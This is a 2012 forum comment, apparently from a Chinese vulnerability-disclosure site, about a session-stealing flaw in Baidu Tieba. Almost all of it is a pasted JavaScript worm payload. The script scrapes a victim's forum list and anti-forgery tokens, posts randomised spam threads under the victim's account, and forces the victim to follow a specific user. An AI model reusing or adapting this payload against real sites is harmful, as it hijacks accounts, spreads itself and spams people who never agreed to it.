2012-05-01 12:14 |
Say ( 路人 | Rank:17 漏洞数:4 | 谁又会鉴定谁正常?)
@anyunix 可以取到session,之前标题也可以这么弹function getmyforum(url){xmlHttp = createXHR(); xmlHttp.open("GET",url,false); xmlHttp.send(); result = xmlHttp.responseText;result = result.match(/\/f\?kw=[A-Z0-9\%]*&from=ucenter/g);return result;}function getarg(forumurl){xmlHttp = createXHR(); xmlHttp.open("GET",forumurl,false); xmlHttp.send(); result = xmlHttp.responseText;forumname = result.match("hidden\" name=\"kw\" id=\"kw\" value=\"[^\"]*").toString().split('"')[6];forumname = encodeURIComponent(forumname);fid = result.match("hidden\" name=\"fid\" id=\"fid\" value=\"[^\"]*").toString().split('"')[6];tbs = result.match("PageData.tbs = \"[a-z0-9]+\";").toString().split('"')[1];return [forumname,fid,tbs];}function publish_delay(data,i){var t=setTimeout("publish(data)",1000*i);}function publish(data){ url="http://tieba.baidu.com/f/commit/thread/add";xmlHttp = createXHR(); xmlHttp.open("POST",url,false); xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8"); xmlHttp.send(data);}function followme(){ url = "http://tieba.baidu.com/i/181104344";xmlHttp = createXHR(); xmlHttp.open("GET",url,false); xmlHttp.send();result = xmlHttp.responseText;tbs = result.match("[^_]tbs : \"[0-9a-z]*\"").toString().split('"')[1];portrait = result.match(/UserInfo.request\(\"[0-9a-z]*/).toString().split('"')[1];if(tbs == null || portrait == null){ return;}inf = 'cmd=follow&tbs=' + tbs + '&portrait=' + portrait;url="http://tieba.baidu.com/i/commit?stamp=" + new Date().getTime();;xmlHttp = createXHR(); xmlHttp.open("POST",url); xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8"); xmlHttp.send(inf);}function random_msg(){var tarr = new Array( '说不过就删帖封号,有意思吗?','这个楼我们一定要盖啊啊啊?','绝对震撼人心的语录,2011年','显然,或者,哦,这事做错了?');var carr = new Array(' RT ',' 难道不是吗? ',' 如题','我想说啥来着??','我爱大清国,我怕他完了....');title = tarr[Math.floor(Math.random()*(tarr.length))];content = carr[Math.floor(Math.random()*(carr.length))];return [encodeURIComponent(title),encodeURIComponent(content)];}比如 这个自动发帖的脚本。。